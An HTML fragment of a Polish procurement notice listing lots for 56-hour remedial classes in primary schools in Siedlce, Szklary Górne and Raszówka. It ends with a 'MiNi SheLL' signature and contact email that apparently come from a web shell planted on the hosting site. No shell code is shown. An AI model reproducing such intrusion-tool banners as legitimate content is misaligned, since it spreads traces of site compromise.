<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Szkole Podstawowej w Siedlcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Siedlcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Szklarach Górnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie 14-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Szkole Podstawowej w Szklarach Górnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie 15-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Szklarach Górnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie 16-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Raszówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie 17-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II a) w Szkole Podstawowej w Raszówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie 18-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa II b) w Szkole Podstawowej w Raszówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie 19-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 4 (klasa III) w Szkole Podstawowej w Raszówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com